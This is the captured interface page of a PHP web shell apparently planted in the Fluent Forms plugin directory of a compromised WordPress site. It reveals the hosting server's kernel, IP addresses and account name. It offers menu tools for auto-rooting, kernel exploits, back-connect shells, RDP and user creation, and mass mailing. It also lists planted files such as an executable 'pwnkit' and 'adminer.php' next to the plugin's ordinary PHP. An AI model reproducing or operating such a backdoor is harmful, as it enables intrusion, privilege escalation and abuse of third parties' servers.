Linux webm016.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.16 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
7.4.33
dottorr
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
dottorr /
www /
wp-content /
plugins /
fluentform /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
boot
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
composer.json
1.19
KB
-rw-r--r--
fluentform.php
952
B
-rw-r--r--
index.php
26
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
33.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fluentform.php
<?php defined('ABSPATH') or die; /** * Plugin Name: Fluent Forms * Description: Contact Form By Fluent Forms is the advanced Contact form plugin with drag and drop, multi column supported form builder plugin * Version: 5.2.4 * Author: Contact Form - WPManageNinja LLC * Author URI: https://fluentforms.com * Plugin URI: https://wpmanageninja.com/wp-fluent-form/ * License: GPLv2 or later * Text Domain: fluentform * Domain Path: /resources/languages */ defined('ABSPATH') or die; defined('FLUENTFORM') or define('FLUENTFORM', true); define('FLUENTFORM_DIR_PATH', plugin_dir_path(__FILE__)); define('FLUENTFORM_FRAMEWORK_UPGRADE', '4.3.22'); defined('FLUENTFORM_VERSION') or define('FLUENTFORM_VERSION', '5.2.4'); if (!defined('FLUENTFORM_HAS_NIA')) { define('FLUENTFORM_HAS_NIA', true); } require __DIR__.'/vendor/autoload.php'; call_user_func(function($bootstrap) { $bootstrap(__FILE__); }, require(__DIR__.'/boot/app.php'));
Close